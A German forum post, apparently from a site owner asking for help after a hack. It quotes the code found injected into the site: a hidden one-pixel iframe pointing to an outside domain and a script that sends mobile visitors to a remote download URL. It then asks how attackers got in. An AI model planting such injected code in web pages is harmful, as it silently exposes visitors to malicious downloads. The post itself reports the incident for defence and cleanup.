Code: Alles auswählen
<iframe name="SagUTeXYne" src="http://aandmcleaning.co.uk/templates/rhuk_milkyway/lite/index.php?out=1328461192" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone)/i)!==null){
window.location = "http://geie.net/load/u/2493/load.auto";
}
//-->
</script>
Der unmittelbare Schaden war schnell behoben, das gesamte Werkel durchsehen und ev. Backup einspielen wird mehr arbeit sein.
Ja - die Frage:
Wie kommen die Hacker überhaupt rein? (über FTP?)
Macht es Sinn, den FTP-Zugang zu ändern?
Wenn über ein Script - wo soll ich suchen? Zeitlich passen würde ein PagePeel-Script, das ich vor ein paar Tagen aktiviert habe.
Das verwendete CMS hat bekannte Lücken, allerdings wurde damit noch nie so eine Art Angriff gemacht. Der Hacker schien gar nicht zu wissen, welches CMS da läuft. Die Datenbank ist unberührt.
Ich möchte jetzt keinen großen Panik!-Rumdumallesneu-Schlag machen. Das ist keine Site, wo es irgendwas tolles zum holen gibt. Loch zu und genug wäre mir lieber.